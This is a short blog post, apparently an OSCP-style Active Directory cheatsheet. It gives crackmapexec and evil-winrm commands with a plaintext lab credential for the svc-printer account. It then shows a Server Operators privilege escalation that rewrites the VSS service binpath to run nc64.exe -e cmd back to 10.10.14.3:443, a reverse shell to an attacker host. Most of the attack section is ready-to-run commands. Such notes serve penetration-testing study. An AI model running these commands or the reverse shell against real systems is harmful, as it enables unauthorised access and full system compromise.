Home AD-Cheatsheet
Post
Cancel

AD-Cheatsheet

Posted 2024-12-18 Updated 2024-12-18 1 min read

Recon

Scan

crackmapexec

  • Check smb share
1
2

crackmapexec smb 10.10.11.108 --shares
crackmapexec smb 10.10.11.108 --shares -u svc-printer -p '1edFg43012!!'
  • Check winrm
1

crackmapexec winrm 10.10.11.108 -u svc-printer -p '1edFg43012!!'

Exploit

WinRM

1

evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'

Privilege Escalation

See priv

1

whoami /priv

Group priv

Server Operators

  • Can edit and run service

Tham khảo: https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/

1
2
3
4
5
6
7
8

PS C:\prog> sc.exe config VSS binpath="C:\windows\system32\cmd.exe /c C:\prog\nc64.exe -e cmd 10.10.14.3 443"
[SC] ChangeServiceConfig SUCCESS
PS C:\prog> sc.exe stop VSS
[SC] ControlService FAILED 1062:

The service has not been started.

PS C:\prog> sc.exe start VSS

Other Tools

If you find my articles interesting, you can buy me a coffee

Cheatsheet
crackmapexec winrm AD Active Directory OSCP
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents